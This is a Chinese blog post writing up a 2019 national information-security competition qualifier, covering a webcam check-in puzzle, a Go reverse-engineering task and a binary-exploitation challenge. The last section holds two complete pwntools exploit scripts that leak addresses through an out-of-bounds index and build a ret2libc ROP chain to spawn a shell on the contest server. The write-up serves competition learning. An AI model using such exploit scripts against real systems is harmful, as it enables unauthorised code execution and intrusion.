<!DOCTYPE html>
<html>
  
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <meta name="author" content="starsdestinations">
  
  
  <title>2019-4-21-第十二届全国信息竞赛预赛 | Hexo</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="Hexo, Theme-AD">
  

  
  <meta name="description" content="starsdestinations的小站">

  

  <script src="//cdn.jsdelivr.net/npm/leancloud-storage@3.11.1/dist/av-min.js" async></script>

  
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML" async></script>
  

  
    <script src="//unpkg.com/valine/dist/Valine.min.js" async></script>
  

  

  <script>
  // theme-ad's config script
  // it can be used in every script
  
  window.AD_CONFIG = {
    leancloud: {"appid":"Hyq9wkH495DgNHWhDQCOfQSp-gzGzoHsz","appkey":"WaR7nrzhliHj9aVwdQzkdlGd","comment":true,"count":true},
    welcome: {"enable":false,"interval":30},
    start_time: "2019-03-13",
    passwords: ["34d4f0765ce3da2322e6cfdce543facea26fe4f4eadde5bd0a986b9df76bd284", ],
    is_post: true,
    lock: false,
    author: "starsdestinations",
    share: {"twitter":false,"facebook":false,"weibo":false,"qq":true,"wechat":true},
    mathjax: true,
    page_type: "",
    root: "/"
  };
</script>

  <script src="/vendor/sha256.min.js"></script>
<script src="/js/auth.js"></script>
<script src="/js/index.js"></script>
<script src="/vendor/qrcode.min.js"></script>

  
    <link rel="icon" href="/images/favicon.ico">
    <link rel="apple-touch-icon" href="/images/touch-icon.png">
  

  <link href="//netdna.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

  <link rel="stylesheet" href="/css/index.css">
<link rel="stylesheet" href="/styles/components/highlight/highlight.css">

  
</head>
  <body>
    <header class="site-header">
  <div class="site-header-brand">
    
      <span class="site-header-brand-title">
        <a href="/">starsdestinations</a>
      </span>
    
    
      <span class="site-header-brand-motto"> | 自学历程</span>
    
  </div>
  <div class="site-header-right">
    <nav class="site-header-navigation">
      
        <a href="/" target="_self">首页</a>
      
        <a href="/archives/" target="_self">归档</a>
      
        <a href="/tags/" target="_self">标签</a>
      
        <a href="/categories/" target="_self">分类</a>
      
        <a href="/friends/" target="_self">友链</a>
      
        <a href="/about/" target="_self">关于</a>
      
    </nav>
    <div class="site-header-btn">
      
        <a href="https://github.com/starsdestinations/" target="_blank" id="site-github">
          <i class="fa fa-github-alt"></i>
        </a>
      
      <a href="javascript:void(0);" id="site-search">
        <i class="fa fa-search"></i>
      </a>
      <a href="javascript:void(0);" id="site-nav-btn">
        <i class="fa fa-ellipsis-v"></i>
      </a>
    </div>
  </div>
</header>
<nav class="table-content" id="site-nav">
  <div class="table-content-title">
    <span>导航</span>
  </div>
  <div class="table-content-main">
    <ol class="toc">
      
        <li class="toc-item">
          <a href="/" target="_self">
            首页
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/archives/" target="_self">
            归档
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/tags/" target="_self">
            标签
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/categories/" target="_self">
            分类
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/friends/" target="_self">
            友链
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/about/" target="_self">
            关于
          </a>
        </li>
      
    </ol>
  </div>
</nav>
<div id="site-process"></div>
    <main>
      
  <div class="passage">
  <div class="passage-meta">
    <span>
      <i class="fa fa-calendar"></i>2019-04-21
    </span>
    
    
      <span>
        | <i class="fa fa-unlock-alt"></i>UNLOCK
      </span>
    
  </div>
  <h1 class="passage-title">
    2019-4-21-第十二届全国信息竞赛预赛
  </h1>
  
  <article class="passage-article">
    <h2 id="MISC-签到"><a href="#MISC-签到" class="headerlink" title="MISC-签到"></a>MISC-签到</h2><p>打开exe文件，报错，出现opencv的字样，估计是图像识别，果断打开摄像头，发现人头会被绿圈圈出，题目是三人行，因为是单人队伍，只好手机百度人像让他识别了。</p>
<h2 id="RE-easyGo"><a href="#RE-easyGo" class="headerlink" title="RE-easyGo"></a>RE-easyGo</h2><p>第一天就一道re，easygo，百度查可能是go语言写的，找不到函数入口，然后这题几分钟就被人秒了，我就估计是非常简单的，然后直接查字符串，flag、congr、correct、Try之类的，最后发现几个说明flag正确或失败的字符串都在sub_495150被调用，然后在几个调用点下断点，就发现flag在寄存器里<br><img src="/images/2019-4-21-dishierjie/2019-4-21-easygo2.png" alt="avatar"><br><img src="/images/2019-4-21-dishierjie/2019-4-21-easygo1.png" alt="avatar"></p>
<h2 id="PWN-your-pwn"><a href="#PWN-your-pwn" class="headerlink" title="PWN-your_pwn"></a>PWN-your_pwn</h2><p><img src="/images/2019-4-21-dishierjie/2019-4-24-yourpwn1.png" alt="avatar"><br>溢出点挺明显的，对数组边界没有进行检查，造成任意地址写入和任意地址泄露<br>因为程序开了NX和PIE，所以在执行ret2libc的时候要先泄露地址<br>初步想法是<br>拿到返回地址<br>计算出rop rdi<br>计算出system_plt<br>拿到栈地址<br>计算出/bin/sh的地址</p>
<p>下一轮</p>
<p>放入/bin/sh<br>修改返回rop<br>修改/bin/sh_addr<br>修改system_plt</p>
<p>Objdump -s pwn查看程序plt表，没发现system，但是发现了puts<br>因为程序加载的基址是不会对地址最后12bit进行随机化的，所以可以根据后12位判断libc库，<a href="https://libc.blukat.me/" target="_blank" rel="noopener">https://libc.blukat.me/</a><br>写泄露脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">elf=ELF(<span class="string">'./pwn'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">libc=ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">s=remote(<span class="string">'39.97.228.196'</span>,<span class="number">60007</span>)</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getaddr</span><span class="params">(num,addr)</span>:</span></span><br><span class="line">	s.sendlineafter(<span class="string">'input index'</span>,str(num))</span><br><span class="line">	re=s.recvuntil(<span class="string">'input'</span>)[<span class="number">-8</span>:<span class="number">-6</span>]</span><br><span class="line">	<span class="keyword">if</span> int(re,<span class="number">16</span>)&lt;=<span class="number">15</span>:</span><br><span class="line">		addr=<span class="string">"0"</span>+hex(int(re,<span class="number">16</span>))[<span class="number">2</span>:]+addr</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		addr=str(hex(int(re,<span class="number">16</span>)))[<span class="number">2</span>:]+addr</span><br><span class="line">	s.sendlineafter(<span class="string">'new value'</span>,str(int(re,<span class="number">16</span>)))</span><br><span class="line"><span class="comment">#	print addr</span></span><br><span class="line">	<span class="keyword">return</span> addr</span><br><span class="line">	</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(num,addr)</span>:</span></span><br><span class="line">	s.sendlineafter(<span class="string">'input index'</span>,str(num))</span><br><span class="line">	re=s.recvuntil(<span class="string">'input'</span>)[<span class="number">-8</span>:<span class="number">-6</span>]</span><br><span class="line"><span class="comment">#	addr=str(hex(int(re,16)))[2:]+addr</span></span><br><span class="line">	s.sendlineafter(<span class="string">'new value'</span>,str(int(addr,<span class="number">16</span>)))</span><br><span class="line">	</span><br><span class="line">s.sendlineafter(<span class="string">'name:'</span>,<span class="string">"yes"</span>)</span><br><span class="line"></span><br><span class="line">b11_addr=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	b11_addr=getaddr(<span class="number">344</span>+i,b11_addr)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"b11_addr:"</span>+b11_addr</span><br><span class="line"></span><br><span class="line">base_addr=int(b11_addr,<span class="number">16</span>)<span class="number">-0xb11</span></span><br><span class="line"><span class="comment">#system_plt=base_addr+elf.plt['system']</span></span><br><span class="line">popedi_addr=base_addr+<span class="number">0xd03</span></span><br><span class="line"></span><br><span class="line">stack_addr=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	stack_addr=getaddr(<span class="number">344</span><span class="number">-8</span>+i,stack_addr)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"stack_addr:"</span>+stack_addr</span><br><span class="line"></span><br><span class="line">bin_addr=int(stack_addr,<span class="number">16</span>)<span class="number">-0x100</span></span><br><span class="line"></span><br><span class="line">libc_addr=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	libc_addr=getaddr(<span class="number">632</span>+i,libc_addr)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"libc_addr:"</span>+libc_addr</span><br><span class="line">libcb=int(libc_addr,<span class="number">16</span>)</span><br><span class="line">libca=int(libc_addr,<span class="number">16</span>)<span class="number">-231</span>-libc.symbols[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">puts_plt=base_addr+elf.plt[<span class="string">'puts'</span>]</span><br><span class="line"></span><br><span class="line">bad=<span class="string">'0'</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">24</span><span class="number">-8</span>+<span class="number">1</span>):</span><br><span class="line">	getaddr(<span class="number">1</span>,bad)</span><br><span class="line"></span><br><span class="line">s.sendlineafter(<span class="string">"do you want continue(yes/no)?"</span>,<span class="string">"yes"</span>)</span><br><span class="line"></span><br><span class="line">popedi=str(hex(popedi_addr)[<span class="number">2</span>:])</span><br><span class="line">popedi=popedi.zfill(<span class="number">16</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	edit(<span class="number">344</span>+i,popedi[<span class="number">2</span>*(<span class="number">8</span>-i)<span class="number">-2</span>:<span class="number">2</span>*(<span class="number">8</span>-i)])</span><br><span class="line"></span><br><span class="line"><span class="comment">#bin=str(hex(bin_addr)[2:])</span></span><br><span class="line"><span class="comment">#bin=bin.zfill(16)</span></span><br><span class="line">libcaddr=hex(int(libc_addr,<span class="number">16</span>))[<span class="number">2</span>:]</span><br><span class="line">libcaddr=libcaddr.zfill(<span class="number">16</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	edit(<span class="number">344</span>+<span class="number">8</span>+i,libcaddr[<span class="number">2</span>*(<span class="number">8</span>-i)<span class="number">-2</span>:<span class="number">2</span>*(<span class="number">8</span>-i)])</span><br><span class="line"></span><br><span class="line">putsplt=str(hex(puts_plt)[<span class="number">2</span>:])</span><br><span class="line">putsplt=putsplt.zfill(<span class="number">16</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"puts_plt:"</span>+putsplt</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	edit(<span class="number">344</span>+<span class="number">16</span>+i,putsplt[<span class="number">2</span>*(<span class="number">8</span>-i)<span class="number">-2</span>:<span class="number">2</span>*(<span class="number">8</span>-i)])</span><br><span class="line">	</span><br><span class="line">bin_sh=<span class="string">"/bin/sh\x00"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	edit(<span class="number">344</span>+<span class="number">24</span>+i,hex(ord(bin_sh[(i):(i+<span class="number">1</span>)]))[<span class="number">2</span>:])</span><br><span class="line"><span class="comment">#gdb.attach(s)</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">24</span><span class="number">-8</span><span class="number">-8</span>+<span class="number">1</span>):</span><br><span class="line">	getaddr(<span class="number">1</span>,bad)</span><br><span class="line">s.sendlineafter(<span class="string">"do you want continue(yes/no)?"</span>,<span class="string">"yes"</span>)</span><br><span class="line"></span><br><span class="line">print(s.recv(<span class="number">1024</span>))</span><br><span class="line">s.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/images/2019-4-21-dishierjie/2019-4-24-yourpwn2.png" alt="avatar"><br>可以看到返回的值，puts遇到/x00会结束</p>
<p>但是这里我遇到了一个坑，就是我kali环境下gdb里显示栈里存放的是libc_start+231，导致我在把获得的后12位去libc库上查不到，之后我想找几个ubuntu的libc查查89 c7 e8 f9  97 01是否存在，然后第一次就在我的ubuntu16上找到了</p>
<p><img src="/images/2019-4-21-dishierjie/2019-4-24-yourpwn3.png" alt="avatar"><br>一算偏移发现是240，于是构造脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">elf=ELF(<span class="string">'./pwn'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">libc=ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">s=remote(<span class="string">'1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com'</span>,<span class="number">57856</span>)</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getaddr</span><span class="params">(num,addr)</span>:</span></span><br><span class="line">	s.sendlineafter(<span class="string">'input index'</span>,str(num))</span><br><span class="line">	re=s.recvuntil(<span class="string">'input'</span>)[<span class="number">-8</span>:<span class="number">-6</span>]</span><br><span class="line">	<span class="keyword">if</span> int(re,<span class="number">16</span>)&lt;=<span class="number">15</span>:</span><br><span class="line">		addr=<span class="string">"0"</span>+hex(int(re,<span class="number">16</span>))[<span class="number">2</span>:]+addr</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		addr=str(hex(int(re,<span class="number">16</span>)))[<span class="number">2</span>:]+addr</span><br><span class="line">	s.sendlineafter(<span class="string">'new value'</span>,str(int(re,<span class="number">16</span>)))</span><br><span class="line"><span class="comment">#	print addr</span></span><br><span class="line">	<span class="keyword">return</span> addr</span><br><span class="line">	</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(num,addr)</span>:</span></span><br><span class="line">	s.sendlineafter(<span class="string">'input index'</span>,str(num))</span><br><span class="line">	re=s.recvuntil(<span class="string">'input'</span>)[<span class="number">-8</span>:<span class="number">-6</span>]</span><br><span class="line"><span class="comment">#	addr=str(hex(int(re,16)))[2:]+addr</span></span><br><span class="line">	s.sendlineafter(<span class="string">'new value'</span>,str(int(addr,<span class="number">16</span>)))</span><br><span class="line">	</span><br><span class="line">s.sendlineafter(<span class="string">'name:'</span>,<span class="string">"yes"</span>)</span><br><span class="line"></span><br><span class="line">b11_addr=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	b11_addr=getaddr(<span class="number">344</span>+i,b11_addr)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"b11_addr:"</span>+b11_addr</span><br><span class="line"></span><br><span class="line">base_addr=int(b11_addr,<span class="number">16</span>)<span class="number">-0xb11</span></span><br><span class="line"><span class="comment">#system_plt=base_addr+elf.plt['system']</span></span><br><span class="line">popedi_addr=base_addr+<span class="number">0xd03</span></span><br><span class="line"></span><br><span class="line">stack_addr=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	stack_addr=getaddr(<span class="number">344</span><span class="number">-8</span>+i,stack_addr)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"stack_addr:"</span>+stack_addr</span><br><span class="line"></span><br><span class="line">bin_addr=int(stack_addr,<span class="number">16</span>)<span class="number">-0x100</span></span><br><span class="line"></span><br><span class="line">libc_addr=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	libc_addr=getaddr(<span class="number">632</span>+i,libc_addr)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"libc_addr:"</span>+libc_addr</span><br><span class="line"></span><br><span class="line">libca=int(libc_addr,<span class="number">16</span>)<span class="number">-240</span><span class="number">-0x20740</span></span><br><span class="line">system_plt=libca+<span class="number">0x45390</span></span><br><span class="line"></span><br><span class="line">bad=<span class="string">'0'</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">24</span><span class="number">-8</span>+<span class="number">1</span>):</span><br><span class="line">	getaddr(<span class="number">1</span>,bad)</span><br><span class="line"></span><br><span class="line">s.sendlineafter(<span class="string">"do you want continue(yes/no)?"</span>,<span class="string">"yes"</span>)</span><br><span class="line"></span><br><span class="line">popedi=str(hex(popedi_addr)[<span class="number">2</span>:])</span><br><span class="line">popedi=popedi.zfill(<span class="number">16</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	edit(<span class="number">344</span>+i,popedi[<span class="number">2</span>*(<span class="number">8</span>-i)<span class="number">-2</span>:<span class="number">2</span>*(<span class="number">8</span>-i)])</span><br><span class="line"></span><br><span class="line">bin=str(hex(bin_addr)[<span class="number">2</span>:])</span><br><span class="line">bin=bin.zfill(<span class="number">16</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	edit(<span class="number">344</span>+<span class="number">8</span>+i,bin[<span class="number">2</span>*(<span class="number">8</span>-i)<span class="number">-2</span>:<span class="number">2</span>*(<span class="number">8</span>-i)])</span><br><span class="line"></span><br><span class="line">syst=str(hex(system_plt)[<span class="number">2</span>:])</span><br><span class="line">syst=syst.zfill(<span class="number">16</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"system:"</span>+syst</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	edit(<span class="number">344</span>+<span class="number">16</span>+i,syst[<span class="number">2</span>*(<span class="number">8</span>-i)<span class="number">-2</span>:<span class="number">2</span>*(<span class="number">8</span>-i)])</span><br><span class="line">	</span><br><span class="line">bin_sh=<span class="string">"/bin/sh\x00"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	edit(<span class="number">344</span>+<span class="number">24</span>+i,hex(ord(bin_sh[(i):(i+<span class="number">1</span>)]))[<span class="number">2</span>:])</span><br><span class="line"><span class="comment">#gdb.attach(s)</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">24</span><span class="number">-8</span><span class="number">-8</span>+<span class="number">1</span>):</span><br><span class="line">	getaddr(<span class="number">1</span>,bad)</span><br><span class="line">s.interactive()</span><br></pre></td></tr></table></figure>

<p>结果就成功拿到进入shell，这次比赛比较奇怪，拿到shell后弹出的是congritulation，然后输入token值就拿到flag了，不懂是怎么实现的，原本我还想现学现写个Dynelf的leak函数来搜索内存的，就是在puts后面再放个libc_start的地址，构成一个可以不断循环的leak函数，然后调用Dynelf函数就能搜索指定的函数起始地址了。</p>
<p>第二天看了眼babypwn没思路，加上有事就没打了</p>

  </article>
  <aside class="table-content" id="site-toc">
  <div class="table-content-title">
    <i class="fa fa-arrow-right fa-lg" id="site-toc-hide-btn"></i>
    <span>目录</span>
  </div>
  <div class="table-content-main">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC-签到"><span class="toc-text">MISC-签到</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RE-easyGo"><span class="toc-text">RE-easyGo</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN-your-pwn"><span class="toc-text">PWN-your_pwn</span></a></li></ol>
  </div>
</aside>
  
    <aside class="passage-copyright">
      <div>本文作者: starsdestinations</div>
      
        <div>
          原文链接: 
          <a href="" target="_blank">http://yoursite.com/passages/2019-4-21-第十二届全国信息竞赛预赛/</a>
        </div>
      
      <div>
        版权声明: 本博客所有文章除特别声明外, 均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议. 转载请注明出处!
      </div>
    </aside>
  
  
</div>

    </main>
    
      
<div class="site-comment-contanier" data-plateform="leancloud">
  
    <p id="site-comment-info">
      <i class="fa fa-spinner fa-spin"></i> 评论加载中
    </p>
    <div id="site-comment"></div>
  
</div>
    
    <div class="site-footer-wrapper">
  <footer class="site-footer">
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">博客推荐</h5>
        
          <span class="site-footer-item">
            <a href="https://godbmw.com/" target="_blank">GodBMW</a>
          </span>
        
          <span class="site-footer-item">
            <a href="http://ruanyifeng.com/" target="_blank">阮一峰的个人网站</a>
          </span>
        
      </div>
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">系列教程</h5>
        
          <span class="site-footer-item">
            <a href="https://godbmw.com/categories/webpack4%E7%B3%BB%E5%88%97%E6%95%99%E7%A8%8B/" target="_blank">webpack4系列教程</a>
          </span>
        
          <span class="site-footer-item">
            <a href="https://godbmw.com/design-patterns/" target="_blank">设计模式手册</a>
          </span>
        
      </div>
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">抓到我</h5>
        
          <span class="site-footer-item">
            <a href="https://github.com/starsdestinations/" target="_blank">github</a>
          </span>
        
      </div>
    
    <div class="site-footer-info">
      <i class="fa fa-clock-o"></i> 本站已稳定运行<span id="site-time"></span>
    </div>
    
      <div class="site-footer-info">
        <i class="fa fa-paw"></i> 您是本站第 <span id="site-count"></span> 位访客
      </div>
    
    
      <div class="site-footer-info">
        <i class="fa fa-at"></i> Email: 944641675@qq.com
      </div>
    
    <div class="site-footer-info">
      <i class="fa fa-copyright"></i> 
      2019 <a href="https://github.com/dongyuanxin/theme-ad/" target="_blank">Theme-AD</a>.
      Created by <a href="https://godbmw.com/" target="_blank">GodBMW</a>.
      All rights reserved.
    </div>
  </footer>
</div>
    <div id="site-layer" style="display:none;">
  <div class="site-layer-content">
    <div class="site-layer-header">
      <span class="site-layer-header-title" id="site-layer-title"></span>
      <i class="fa fa-close" id="site-layer-close"></i>
    </div>
    <div class="site-layer-body" id="site-layer-container">
      <div class="site-layer-input" id="site-layer-search" style="display: none;">
        <input type="text">
        <i class="fa fa-search"></i>
      </div>
      <div class="site-layer-reward" id="site-layer-reward" style="display: none;">
        
          <div>
            <img src="/images/wechat.png" alt="WeChat">
            
              <p>WeChat</p>
            
          </div>
        
      </div>
      <div id="site-layer-welcome" style="display:none;"></div>
    </div>
  </div>
</div>
    

<div class="bottom-bar">
  <div class="bottom-bar-left">
    <a href="/passages/2019-5-28-自己动手写操作系统(1)/" data-enable="true">
      <i class="fa fa-arrow-left"></i>
    </a>
    <a href="/passages/2019-4-18-noinfoleak/" data-enable="true">
      <i class="fa fa-arrow-right"></i>
    </a>
  </div>
  <div class="bottom-bar-right">
    <a href="javascript:void(0);" data-enable="true" id="site-toc-show-btn">
      <i class="fa fa-bars"></i>
    </a>
    
      <a href="#site-comment" data-enable="true">
        <i class="fa fa-commenting"></i>
      </a>
    
    <a href="javascript:void(0);" id="site-toggle-share-btn">
      <i class="fa fa-share-alt"></i>
    </a>
    <a href="javascript:void(0);" id="site-reward">
      <i class="fa fa-thumbs-up"></i>
    </a>
    <a href="javascript:void(0);" id="back-top-btn">
      <i class="fa fa-chevron-up"></i>
    </a>
  </div>
</div>
    <div id="share-btn">
  
  
  
  
    <a id="share-btn-qq" href="javascript:void(0);" target="_blank">
      <i class="fa fa-qq"></i>
    </a>
  
  
    <a id="share-btn-wechat" href="javascript:void(0);" target="_blank">
      <i class="fa fa-wechat"></i>
    </a>
  
</div>
    





    
  </body>
</html>